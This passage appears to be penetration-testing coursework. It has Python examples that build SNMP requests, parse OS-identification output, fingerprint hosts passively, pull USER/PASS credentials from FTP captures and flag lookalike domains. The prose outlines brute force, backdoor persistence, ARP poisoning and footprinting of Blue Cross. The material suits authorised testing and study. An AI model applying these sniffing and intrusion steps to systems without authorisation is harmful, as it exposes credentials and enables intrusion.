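    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(body)) + body


def enc_int(value: int) -> bytes:
    return tlv(0x02, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big", signed=True))


def enc_oid(dotted: str) -> bytes:
    """Dotted OID: first two arcs packed into one byte, remaining arcs base-128."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_get_request(community: str, oids: list, version: int = 1, request_id: int = 0x1234) -> bytes:
    """SNMP GetRequest message; version 0 is v1, 1 is v2c."""
    varbinds = b"".join(tlv(0x30, enc_oid(o) + tlv(0x05, b"")) for o in oids)
    pdu = tlv(0xA0, enc_int(request_id) + enc_int(0) + enc_int(0) + tlv(0x30, varbinds))
    return tlv(0x30, enc_int(version) + tlv(0x04, community.encode()) + pdu)

# ---- decoder ----

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, body, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def dec_oid(body: bytes) -> str:
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}


def parse_snmp(packet: bytes) -> dict:
    """Message = SEQUENCE { version, community, PDU }; PDU holds three INTEGERs then varbinds."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    pos = 0
    for _ in range(3):                       # request-id, error-status, error-index
        _, _, pos = _read_tlv(pdu, pos)
    _, varbinds, _ = _read_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(varbinds):
        _, vb, pos = _read_tlv(varbinds, pos)
        _, oid_body, _ = _read_tlv(vb, 0)
        oids.append(dec_oid(oid_body))
    return {"version": {0: "v1", 1: "v2c"}.get(int.from_bytes(ver, "big", signed=True), "other"),
            "community": community.decode("ascii", errors="replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "oids": oids}

# ---- policy checks ----

DEFAULT_COMMUNITIES = {"public", "private"}
ALLOWED_VIEW = ("1.3.6.1.2.1.1.",)   # constructed view: the system group only


def community_is_strong(s: str) -> bool:
    """At least 12 characters and all four character classes, per the recommendation above."""
    return len(s) >= 12 and all(re.search(p, s) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z\d]"))


def assess(packet: bytes):
    """Decode one request and return (decoded message, list of policy findings)."""
    msg = parse_snmp(packet)
    findings = []
    if msg["community"] in DEFAULT_COMMUNITIES:
        findings.append("default community string")
    elif not community_is_strong(msg["community"]):
        findings.append("weak community string")
    findings += [f"OID outside allowed view: {o}" for o in msg["oids"] if not o.startswith(ALLOWED_VIEW)]
    return msg, findings


# Constructed samples: sysDescr.0 and sysName.0 with the default community, and a strong
# community asking for an interface-table OID that the view does not permit.
SAMPLE_DEFAULT = build_get_request("public", ["1.3.6.1.2.1.1.1.0", "1.3.6.1.2.1.1.5.0"])
SAMPLE_STRONG = build_get_request("G&8jR4t^X1kL!9", ["1.3.6.1.2.1.1.1.0", "1.3.6.1.2.1.2.2.1.2.1"])

if __name__ == "__main__":
    for pkt in (SAMPLE_DEFAULT, SAMPLE_STRONG):
        msg, findings = assess(pkt)
        print(msg, findings or "ok")
```

Feed `assess()` the UDP payload of each packet captured on port 161 and count findings per source address; a burst of "default community string" or "weak community string" results from one source is the failed-request pattern the alerting step above describes. The view check is the monitoring-side twin of the SNMP view configured on the agent.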

Task 3(a): Techniques for Identifying the OS Version

Identifying the operating system version during a penetration test involves several key stages:
Enumeration, Exploitation, and Post-Exploitation. Each stage employs specific techniques to gather
information, exploit vulnerabilities, and verify details about the target system's OS.

1. Enumeration

Techniques:

1. Network Scanning:

o Objective: Discover active hosts and their IP addresses within the network.

o Approach: Perform network scans to detect live devices. Techniques include sending
ICMP echo requests (ping) or TCP/UDP probes to identify which IP addresses are in use.

2. Port Scanning:

o Objective: Identify open ports on the target devices to determine which services are
running.

o Approach: Conduct thorough port scans to enumerate open ports and determine the
types of services associated with those ports. This includes scanning well-known ports
(0-1023) and higher ports (1024-65535) for additional services.

3. Service Enumeration:

o Objective: Gather detailed information about services running on open ports.

o Approach: Examine service banners and use protocol-specific queries to identify the
software and version in use. Techniques involve banner grabbing, where responses from
services are captured and analyzed to extract version information.

Importance of Enumeration:

• Why: Enumeration provides a comprehensive understanding of the network, identifying
potential targets and entry points.

• How: Detailed scanning reveals the attack surface, highlighting vulnerable services that can be
exploited. This stage is crucial for mapping the network topology and understanding the security
landscape.

2. Exploitation

Techniques:

1. Vulnerability Scanning:

o Objective: Identify vulnerabilities in discovered services.

o Approach: Analyze service banners and cross-reference with known vulnerability
databases. This can include checking for outdated software versions and known exploits
that can be leveraged.

2. Exploit Development/Selection:

o Objective: Develop or select appropriate exploits to target identified vulnerabilities.

o Approach: Choose or create exploits tailored to the specific vulnerabilities discovered.
This involves understanding the exploit code, modifying it if necessary, and executing it
to gain access.

3. Brute Force Attacks:

o Objective: Gain access by cracking user credentials.

o Approach: Systematically attempt various username and password combinations to gain
unauthorized access. This can involve dictionary attacks, where a list of common
passwords is tried, or more sophisticated approaches like credential stuffing.

Importance of Exploitation:

• Why: Successfully exploiting vulnerabilities allows penetration testers to gain initial access to the
target system.

• How: Using precise exploits or brute force techniques to penetrate defenses and establish a
foothold. This stage transforms theoretical vulnerabilities into practical entry points.

3. Post-Exploitation

Techniques:

1. Maintaining Access:

o Objective: Ensure continued access to the compromised system.

o Approach: Implement backdoors or other persistence mechanisms. This can include
modifying system scripts to re-establish a connection upon reboot or using legitimate
features (like scheduled tasks) for persistence.

2. Privilege Escalation:

o Objective: Increase privileges to gain complete control over the system.

o Approach: Exploit local vulnerabilities to escalate privileges. This can involve exploiting
misconfigurations, known local exploits, or weaknesses in the operating system to gain
administrative or root access.

3. OS Identification:

o Objective: Accurately identify the operating system version.

o Approach: Execute specific commands to reveal detailed OS information. For instance, in
Windows, using system information commands; in Linux, querying the kernel and OS
release files.

Commands for OS Identification:

• Windows:

o Objective: Retrieve comprehensive system information.

o Approach: Execute commands that provide system version, architecture, and other
details.

o Command: systeminfo reveals Windows version, build number, service packs, and more.

o Command: ver displays the OS version.

• Linux:

o Objective: Get kernel and OS version details.

o Approach: Use commands to query the kernel and OS release information.

o Command: uname -a provides kernel version, hostname, and other details.

o Command: cat /etc/os-release displays OS distribution and version.
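The commands listed above produce free-form text. As an added example (not from the original document), here are Python parsers for systeminfo, uname -a and /etc/os-release output that turn it into fields an asset inventory or patch-level check can compare. The three sample outputs are constructed, not captured from a real host, and the function names are this example's own.

```python
"""Parsers for the OS-identification command output listed above: Windows systeminfo,
Linux uname -a and /etc/os-release.

Added example; the three sample outputs are constructed, not captured from a host.
"""
import re
import shlex

# Machine-architecture tokens used to find where the build string ends in `uname -a`.
ARCH = re.compile(r"^(x86_64|amd64|aarch64|arm64|armv\dl|i[3-6]86|ppc64le|s390x)$")


def parse_os_release(text: str) -> dict:
    """KEY=value lines, values optionally double-quoted; '#' comments and blanks ignored."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        parts = shlex.split(value)            # strips the shell-style quoting
        info[key.strip()] = parts[0] if parts else ""
    return info


def parse_uname(line: str) -> dict:
    """Split `uname -a` into kernel, hostname, release, build string and machine."""
    fields = line.split()
    if len(fields) < 3:
        raise ValueError("unexpected uname -a output")
    machine = next((f for f in fields[3:] if ARCH.match(f)), "")
    end = fields.index(machine) if machine else len(fields)
    return {"kernel": fields[0], "hostname": fields[1], "release": fields[2],
            "version": " ".join(fields[3:end]), "machine": machine}


def kernel_version(release: str) -> tuple:
    """Numeric (major, minor, patch) from a release string such as 5.15.0-91-generic."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"no version number in {release!r}")
    return tuple(int(x) for x in m.groups())


def parse_systeminfo(text: str) -> dict:
    """'Key:   value' lines from systeminfo; indented continuation lines are skipped."""
    info = {}
    for line in text.splitlines():
        if not line or line[0].isspace() or ":" not in line:
            continue
        key, _, value = line.partition(":")
        info[key.strip()] = value.strip()
    return info


def summarize_linux(os_release_text: str, uname_line: str) -> str:
    """One-line identification combining both Linux sources."""
    osr, u = parse_os_release(os_release_text), parse_uname(uname_line)
    name = osr.get("PRETTY_NAME", osr.get("NAME", "?"))
    return f"{name}, kernel {u['release']} ({u['machine']}) on {u['hostname']}"


# Constructed sample outputs.
OS_RELEASE = '''NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 22.04.3 LTS"
VERSION_ID="22.04"
VERSION_CODENAME=jammy
'''
UNAME = "Linux fileserver01 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux"
SYSTEMINFO = """Host Name:                 FIN-WS-07
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5000000
"""

if __name__ == "__main__":
    print(summarize_linux(OS_RELEASE, UNAME))
    si = parse_systeminfo(SYSTEMINFO)
    print(f"{si['OS Name']} {si['OS Version']} on {si['Host Name']}")
```

The structured output is what a defender compares against a minimum supported version list: `kernel_version()` gives a tuple that sorts correctly, which a plain string comparison of "5.15.0" against "5.4.0" does not.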

Importance of Post-Exploitation:

• Why: Post-exploitation techniques provide deeper access and understanding of the
compromised system.

• How: By executing specific commands, detailed OS information is retrieved, aiding in further
actions. This stage solidifies control over the system and allows for extensive data gathering and
analysis.

Summary

Identifying the OS version is a multi-stage process that requires careful enumeration, exploitation, and
post-exploitation techniques. Emphasizing techniques over tools ensures a versatile approach, adaptable
to various scenarios and environments. Understanding the network, identifying vulnerabilities, and
verifying system details through precise commands and methodologies are crucial for effective
penetration testing and OS identification. Each stage builds on the previous one, from mapping the
network to exploiting vulnerabilities and finally confirming the OS version through detailed post-
exploitation analysis.

Identifying the OS version without traditional enumeration techniques

Identifying the OS version without traditional enumeration techniques involves a mix of passive
observation, leveraging existing access, social engineering, and utilizing third-party services. Passive
observation includes methods like network sniffing to capture traffic and analyze OS-specific signatures,
or fingerprinting HTTP headers to deduce OS information from User-Agent strings. Leveraging existing
access focuses on exploiting application-specific information or analyzing detailed error messages that
disclose system paths and versions. Social engineering techniques manipulate human behavior through
phishing campaigns or impersonation tactics to extract OS details. Utilizing third-party services involves
accessing cloud management interfaces or remote monitoring tools to retrieve OS information from
legitimate sources. These alternative methods provide non-intrusive, creative ways to gather OS details,
combining technical analysis, human interaction, and legitimate service usage to create a comprehensive
strategy for OS identification.
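
The following Python script is an added example, not part of the original document, showing the two passive signals just described on constructed data: it rounds an observed IP TTL to the nearest well-known default initial TTL to guess the OS family and hop count, parses the HTTP Server header out of a raw response, and reports whether the two hints agree. The TTL defaults and the header keywords are standard values; the sample responses and TTLs are constructed.

```python
"""Passive OS hints from a packet capture: round the observed IP TTL to a default
initial TTL and read the HTTP Server header. Added example; the sample values
below are constructed, not taken from a real capture."""
import re

# Default initial TTLs used by common network stacks (widely documented defaults).
INITIAL_TTLS = {64: "Linux/Unix-like", 128: "Windows", 255: "Cisco IOS/Solaris/BSD-style"}

SERVER_RE = re.compile(r"^Server:\s*(.+?)\r?$", re.IGNORECASE | re.MULTILINE)


def guess_os_from_ttl(observed_ttl):
    """Round an observed TTL up to the nearest default initial TTL.
    Returns (os_family, estimated_hops); hops are how far the TTL has decayed."""
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    return "unknown", 0


def os_hint_from_server_header(http_response):
    """Pull the Server header out of a raw HTTP response and map it to an OS family."""
    match = SERVER_RE.search(http_response)
    if not match:
        return None, "no Server header (stripped or hardened front end)"
    server = match.group(1).strip()
    low = server.lower()
    if "microsoft-iis" in low or "win32" in low or "win64" in low:
        return server, "Windows"
    if any(tag in low for tag in ("ubuntu", "debian", "centos", "red hat", "fedora", "unix")):
        return server, "Linux/Unix-like"
    return server, "unknown"


def passive_os_profile(observed_ttl, http_response):
    """Combine both hints. Disagreement usually means a proxy, load balancer or
    CDN is answering for the real host, so treat the result as a lead, not a fact."""
    ttl_family, hops = guess_os_from_ttl(observed_ttl)
    server, header_family = os_hint_from_server_header(http_response)
    return {
        "ttl_guess": ttl_family,
        "estimated_hops": hops,
        "server_header": server,
        "header_guess": header_family,
        "consistent": ttl_family == header_family and ttl_family != "unknown",
    }


# Constructed samples: what a sniffer would show for an HTTP reply from each host.
SAMPLE_LINUX_TTL = 52
SAMPLE_LINUX_HTTP = ("HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                     "Content-Type: text/html\r\n\r\n<html></html>")
SAMPLE_WINDOWS_TTL = 126
SAMPLE_WINDOWS_HTTP = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/10.0\r\n"
                       "X-Powered-By: ASP.NET\r\n\r\n")

if __name__ == "__main__":
    print(passive_os_profile(SAMPLE_LINUX_TTL, SAMPLE_LINUX_HTTP))
    print(passive_os_profile(SAMPLE_WINDOWS_TTL, SAMPLE_WINDOWS_HTTP))
```

The hop estimate is only meaningful when the capture point is on the path to the real host; a TTL of 126 with an Apache/Ubuntu banner is the typical signature of a Windows reverse proxy in front of a Linux application server, which is exactly the kind of inconsistency the `consistent` flag is meant to surface.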

TASK3(b)

Performing Packet Sniffing Pentest on an FTP Server Using Wireshark

Packet sniffing on an FTP server involves capturing and analyzing the network traffic to and from the
server. This process helps identify potential security vulnerabilities, such as unencrypted credentials or
sensitive data being transmitted. Here’s a detailed step-by-step guide:

1. Prepare the Environment

Ensure that Wireshark is installed on your Kali Linux machine. Wireshark is a powerful network protocol
analyzer that allows you to capture and interactively browse the traffic running on a computer network.

2. Identify the Target

Before starting packet sniffing, you need to identify the target FTP server and its IP address within the
network. This can be done through network scanning using tools like Nmap. Network scanning helps you
understand the network layout and locate devices that are running FTP services.

3. Start Packet Capture

 Launch Wireshark: Open Wireshark from the applications menu or via terminal.

 Select the Network Interface: Choose the network interface that is connected to the target
network (e.g., eth0 or wlan0). Selecting the correct interface is crucial for capturing the right
traffic.

 Apply Capture Filter: To focus on FTP traffic, apply the capture filter tcp port 21, the
default port for the FTP control channel. This keeps the capture small and still contains the
commands and credentials, but file contents travel on a separate data connection: TCP port 20 from
the server in active mode, or a high port announced in the server's 227 reply (or the client's PORT
command) in passive mode. If the transferred files matter, capture on host <ftp-server-ip> instead
and narrow down afterwards with the display filter ftp || ftp-data.

4. Analyze FTP Traffic

 Start Capturing: Begin the packet capture by clicking the start capture button. Wireshark will
start capturing all traffic on the specified interface that matches the capture filter.

 Monitor Login Attempts: Look for packets that carry the FTP login sequence. Plain FTP
sends credentials in clear text: the USER command (followed by the username), the server's 331
reply asking for a password, the PASS command (followed by the password), and a 230 reply on
success or 530 on failure.

 Inspect Data Transmission: Examine the captured packets to see what is being transmitted
in clear text. Directory listings (LIST, NLST) and file contents (RETR, STOR) move over the data
connection, so look for them there; the control channel shows only the commands and file names.

5. Extract Useful Information


 Follow TCP Stream: To get a clear view of the conversation between the FTP client and server,
you can use the "Follow TCP Stream" feature in Wireshark. This reconstructs the entire
conversation, making it easier to read and analyze.

 Identify Unencrypted Credentials: Look for USER and PASS commands in the TCP stream. If the
server has not negotiated TLS (explicit FTPS begins with AUTH TLS and a 234 reply, after which the
stream becomes unreadable), these credentials will be in plain text. SFTP does not appear here at
all: it runs over SSH on port 22 and is a different protocol, not FTP with encryption.

6. Save and Analyze Capture

 Save the Capture: Once you have captured enough data, save the capture file for further
analysis. This allows you to revisit the data and use additional tools or techniques to extract
more information.

 Detailed Analysis: Use Wireshark’s built-in tools to analyze the captured data further. Apply
display filters to narrow down interesting packets and focus on specific types of traffic or events.

7. Correlate with Other Tools

While Wireshark is the primary tool for packet sniffing, other tools can complement the analysis:

 Tcpdump: A command-line packet analyzer that can be used to capture packets for later analysis
in Wireshark.

 Ettercap: Useful for ARP poisoning to capture traffic on switched networks when your machine
is not already in the path. This is an active, potentially disruptive technique and must be within
the engagement's scope.

 dsniff: A suite of tools for network auditing and penetration testing, including tools for capturing
FTP credentials.

8. Identify Potential Vulnerabilities

 Unencrypted Data: Check if any sensitive information or credentials are transmitted in plain text.
This is a significant security risk and indicates that plain FTP should be replaced with SFTP, or
with FTPS where TLS is enforced on both the control and the data channel.

 Configuration Weaknesses: Look for signs of weak or default configurations on the FTP server,
such as anonymous login being accepted (USER anonymous answered with 230) or default passwords.

 Traffic Patterns: Analyze the captured traffic for unusual patterns that might indicate
unauthorized access attempts or data exfiltration. For example, repeated login attempts could
suggest a brute-force attack, while unexpected data transfers might indicate data leakage.
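
As an added example that is not part of the original document, the following Python script performs the analysis described in steps 4 to 8 on the text that Wireshark's "Follow TCP Stream" produces for the control channel: it extracts USER/PASS pairs together with the server's 230/530 verdict, flags anonymous logins and an AUTH TLS upgrade, records the file names moved with RETR/STOR, decodes the data-channel endpoint from PASV (227) replies and PORT commands, and builds a Wireshark display filter that covers those data ports as well. The sample stream is constructed.

```python
"""Triage a reconstructed FTP control-channel conversation (the text Wireshark's
"Follow TCP Stream" shows for tcp.port == 21). Added example; the stream below is
constructed, not from a real capture."""
import re

PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

SAMPLE_STREAM = """220 (vsFTPd 3.0.3)
USER anonymous
331 Please specify the password.
PASS guest@example.com
530 Login incorrect.
USER backupadmin
331 Please specify the password.
PASS Winter2024!
230 Login successful.
PASV
227 Entering Passive Mode (10,0,0,5,195,80).
RETR patients.csv
150 Opening BINARY mode data connection for patients.csv (5120 bytes).
226 Transfer complete.
QUIT
221 Goodbye.
"""


def _endpoint(six_numbers):
    """PASV/PORT encode host and port as h1,h2,h3,h4,p1,p2 with port = p1*256 + p2."""
    h1, h2, h3, h4, p1, p2 = (int(n) for n in six_numbers)
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def analyze_ftp_stream(stream):
    """Return credentials with login outcome, anonymous use, TLS upgrade,
    negotiated data-channel endpoints and transferred file names."""
    result = {"credentials": [], "anonymous": False, "tls_upgrade": False,
              "data_endpoints": [], "transfers": []}
    user = password = None
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        cmd, arg = cmd.upper(), arg.strip()
        if cmd == "AUTH" and arg.upper() in ("TLS", "SSL", "TLS-C", "TLS-P"):
            # Explicit FTPS: after the server's 234 reply the stream is encrypted,
            # so an absent USER/PASS here is expected, not a missed finding.
            result["tls_upgrade"] = True
        elif cmd == "USER":
            user, password = arg, None
            if user.lower() in ("anonymous", "ftp"):
                result["anonymous"] = True
        elif cmd == "PASS":
            password = arg
        elif cmd == "230" and user is not None:        # login accepted
            result["credentials"].append((user, password, "OK"))
            user = password = None
        elif cmd == "530" and user is not None:        # login refused
            result["credentials"].append((user, password, "FAILED"))
            user = password = None
        elif cmd in ("RETR", "STOR"):
            result["transfers"].append(arg)
        elif cmd == "PORT":                            # active mode: client announces
            parts = arg.split(",")
            if len(parts) == 6:
                result["data_endpoints"].append(_endpoint(parts))
        elif cmd == "227":                             # passive mode: server announces
            match = PASV_RE.search(arg)
            if match:
                result["data_endpoints"].append(_endpoint(match.groups()))
    return result


def build_display_filter(result):
    """Wireshark display filter covering the control channel plus every negotiated
    data port, so the file contents are not missed by a port-21-only view."""
    ports = [21] + sorted({port for _, port in result["data_endpoints"]})
    return " || ".join(f"tcp.port == {p}" for p in ports)


if __name__ == "__main__":
    findings = analyze_ftp_stream(SAMPLE_STREAM)
    print(findings)
    print(build_display_filter(findings))
```

Paste the stream from "Follow TCP Stream" into a file and feed it to analyze_ftp_stream; the returned display filter is what to apply to the full capture to recover the file bodies that a port-21 capture filter would have dropped.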

Conclusion

Packet sniffing using Wireshark is a powerful method for analyzing the security of an FTP server. By
capturing and examining the network traffic, you can identify vulnerabilities such as unencrypted
credentials and sensitive data being transmitted in clear text. This detailed analysis helps in
understanding the security posture of the FTP server and implementing necessary measures to secure it.
While Wireshark is the primary tool for this task, integrating it with other tools like Tcpdump, Ettercap,
and dsniff can provide a comprehensive view of network security.

Task 4
(b) Methods for Tracking and Monitoring Hospital's Online Reputation

1. Web Crawling and Data Mining

 Description: Automated crawling of websites, forums, and social media platforms to collect and
analyze mentions of the hospital.

 Techniques:

o Develop custom web crawlers to scan various online platforms for specific keywords
related to the hospital.

o Use data mining techniques to extract relevant information from collected data.

o Perform regular analysis to detect changes and trends in online mentions.

 Implementation:

o Set up and configure web crawlers to scan the internet continuously for mentions of the
hospital.

o Use machine learning algorithms to analyze the data and identify patterns or anomalies.

o Regularly review and interpret the results to understand public perception and emerging
threats.

2. Dark Web Monitoring

 Description: Monitor dark web forums and marketplaces for discussions or data related to the
hospital.

 Techniques:

o Use specialized tools to access and monitor dark web sites.

o Track mentions of the hospital, its staff, and any potentially leaked information.

o Analyze dark web activity to identify potential threats or breaches.

 Implementation:

o Employ dark web monitoring services or set up custom scripts to track relevant
keywords.

o Regularly scan for data dumps, credentials, and other sensitive information that could
indicate a security breach.

o Collaborate with law enforcement and cybersecurity experts to respond to any
findings.

3. Threat Intelligence Gathering

 Description: Collect and analyze threat intelligence related to the hospital from various sources.

 Techniques:

o Subscribe to threat intelligence feeds that provide information on emerging threats
targeting healthcare organizations.

o Analyze threat intelligence reports to identify potential vulnerabilities and attack vectors.

o Use threat intelligence to inform security policies and incident response plans.

 Implementation:

o Integrate threat intelligence feeds into your security operations center (SOC) for
continuous monitoring.

o Regularly review threat intelligence reports and adjust security measures accordingly.

o Conduct threat hunting activities based on the latest intelligence to proactively identify
and mitigate risks.

4. Monitoring for Data Breaches

 Description: Detect and respond to data breaches involving the hospital's information.

 Techniques:

o Use data breach detection services to monitor for signs of compromised data.

o Analyze breach data to understand the scope and impact of the incident.

o Implement measures to contain and remediate the breach.

 Implementation:

o Set up alerts for any breaches involving the hospital’s data, including patient records and
sensitive information.

o Conduct a forensic analysis to determine the cause and impact of the breach.

o Notify affected parties and comply with regulatory requirements for breach disclosure.

5. Brand Abuse Monitoring

 Description: Track and mitigate instances of brand abuse, such as fake websites and phishing
campaigns.

 Techniques:

o Monitor the internet for websites and domains that mimic the hospital’s brand.

o Analyze phishing emails and other malicious communications targeting the hospital’s
patients and staff.

o Take down fraudulent websites and mitigate phishing campaigns.

 Implementation:

o Use brand monitoring services to detect and report instances of brand abuse.

o Work with internet service providers (ISPs) and domain registrars to remove fraudulent
websites.

o Educate patients and staff about phishing threats and how to recognize them.
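
The domain-mimicry check in the Techniques list above can be automated. The Python script below is an added example, not part of the original document: it generates single-edit typosquat and homoglyph variants of the hospital's domain label, then scores a list of observed domains, skipping the brand's own subdomains so legitimate hosts are not reported. The hospital domain and the observed domains are constructed; in practice the observed list would come from certificate-transparency logs, passive DNS or a newly-registered-domain feed.

```python
"""Lookalike-domain detection for brand-abuse monitoring. Added example; the
brand domain and the observed feed are constructed."""

# One-character swaps that read the same at a glance (constructed, non-exhaustive).
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5",
              "m": "rn", "rn": "m", "vv": "w"}


def typosquat_variants(label):
    """Single-edit variants of a domain label: omission, repeated character,
    adjacent transposition and one homoglyph substitution."""
    variants = set()
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])                 # omission
        variants.add(label[:i] + label[i] + label[i:])           # repeated character
    for i in range(len(label) - 1):
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])   # transposition
    for src, dst in HOMOGLYPHS.items():
        if src in label:
            variants.add(label.replace(src, dst, 1))
    variants.discard(label)
    return variants


def levenshtein(a, b):
    """Edit distance, to catch variants the generator does not enumerate."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_domains(brand, observed, max_distance=2):
    """Return (domain, reason) for observed domains that impersonate `brand`.
    The brand itself and its own subdomains are skipped."""
    brand = brand.lower()
    brand_label = brand.rsplit(".", 1)[0]
    variants = typosquat_variants(brand_label)
    hits = []
    for domain in observed:
        domain = domain.lower().rstrip(".")
        if domain == brand or domain.endswith("." + brand):
            continue                                   # legitimate host
        label = domain.rsplit(".", 1)[0]
        if label == brand_label:
            hits.append((domain, "same label, different TLD"))
        elif label in variants:
            hits.append((domain, "typosquat/homoglyph variant"))
        elif brand_label in label:
            hits.append((domain, "brand embedded in label"))
        elif levenshtein(label, brand_label) <= max_distance:
            hits.append((domain, f"edit distance <= {max_distance}"))
    return hits


# Constructed feed of newly seen domains.
OBSERVED = [
    "mercyhospital.org", "portal.mercyhospital.org", "mercyhospital.com",
    "mercyh0spital.org", "mercyhospitl.org", "mercyhospital-patientlogin.net",
    "mercyhospitol.org", "cityclinic.com",
]

if __name__ == "__main__":
    for domain, reason in score_domains("mercyhospital.org", OBSERVED):
        print(f"{domain:35} {reason}")
```

The checks are ordered from most to least specific so each hit carries the strongest reason; the edit-distance fallback is deliberately last and capped at 2, since a looser threshold floods the report with unrelated short labels.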

6. Security Information and Event Management (SIEM)

 Description: Use SIEM systems to collect and analyze security events related to online reputation
threats.

 Techniques:

o Integrate various data sources into the SIEM for comprehensive monitoring.

o Use correlation rules to detect patterns indicative of reputation threats, such as
coordinated social media attacks or data leaks.

o Generate alerts and reports to respond to potential reputation threats in real-time.

 Implementation:

o Configure the SIEM to include data from social media, review sites, threat intelligence
feeds, and other relevant sources.

o Develop and tune correlation rules to detect suspicious activity related to the hospital’s
reputation.

o Use the SIEM’s reporting capabilities to provide regular updates on potential reputation
threats.

By employing these cybersecurity-related methods, the hospital can proactively monitor and protect its
online reputation from various threats, ensuring a secure and trustworthy presence in the digital space.

To effectively footprint Blue Cross's network infrastructure, several tools and methods can be employed.
Here is a detailed breakdown of each tool and its use in the steps of footprinting:

WHOIS

WHOIS is a query and response protocol used to obtain information about the ownership and
registration details of domain names and IP address blocks. By querying WHOIS databases, you can gather
information about Blue Cross's domain registration, including the registrar, registration dates, name
servers, and contact information (often redacted by privacy services since GDPR). A domain record does
not list IP addresses; instead, WHOIS lookups against the addresses the domain resolves to, served by
the regional registries (ARIN, RIPE and the others), return the netblocks the organization owns, which
is what actually scopes the network footprint. WHOIS data can also provide insights into the
organization's public-facing assets and administrative contacts.

Nslookup and Dig

Nslookup and Dig are command-line tools used for querying DNS records. These tools
can help retrieve various DNS records such as A, MX, NS, and TXT records. By using Nslookup or Dig, you
can discover subdomains, mail servers, name servers, and other DNS-related information associated with
Blue Cross's domain; a zone transfer (AXFR) attempt against each discovered name server is worth one
try, since a misconfigured server hands over the whole zone. This information is crucial for mapping
the domain structure and identifying potential entry points for further analysis.

Nmap

Nmap is a network scanning tool used to identify live hosts, open ports, and services running on
those ports. Unlike the passive sources above, it sends packets to the target, so it belongs to the
authorized, in-scope part of the engagement. By scanning the netblocks found earlier, you can enumerate
active devices within Blue Cross's network and gather details about the services they are running.
Nmap's version and OS detection can also estimate the operating system and version of the target
devices, which aids in identifying potential vulnerabilities and understanding the network's
configuration.

Traceroute

Traceroute is a network diagnostic tool used to trace the path packets take from the source
to the destination. By performing a traceroute to Blue Cross's IP addresses, you can map the network
path and identify intermediate devices such as routers and gateways. This information helps in
understanding the network topology, identifying potential choke points, and discovering network
infrastructure components.

Shodan and Censys

Shodan and Censys are search engines that index information about internet-
connected devices and services. By querying these platforms, you can find exposed devices, services,
and potential vulnerabilities associated with Blue Cross's IP addresses. Shodan and Censys provide
detailed information about the device type, operating system, and open ports, helping to identify
misconfigurations and exposed services that could be targeted.

Maltego

Maltego is a data visualization and analysis tool used to map and analyze relationships between
entities. By using Maltego, you can create a visual representation of Blue Cross's network infrastructure,
including domains, IP addresses, email addresses, and social media profiles. Maltego helps in identifying
connections and dependencies between different entities, providing a holistic view of the network's
structure and potential attack vectors.

Recon-ng and theHarvester

Recon-ng and theHarvester are open-source reconnaissance tools used for
gathering information from multiple sources. These tools can collect data from search engines, social
media platforms, and public databases to build a comprehensive profile of Blue Cross's online presence.
By using these tools, you can identify email addresses, employee details, and additional subdomains
associated with Blue Cross, aiding in the footprinting process.

Google Dorks

Google Dorks involve using advanced search queries to find specific information indexed
by search engines. By crafting targeted search queries, you can discover sensitive information,
misconfigurations, and exposed files related to Blue Cross's network infrastructure. Google Dorks can
help verify findings from other tools and uncover additional data that may not be easily accessible.

By utilizing these tools and methods, a detailed and comprehensive footprint of Blue Cross's network
infrastructure can be built. This multi-tool approach ensures a thorough understanding of the network's
assets, potential vulnerabilities, and overall security posture.

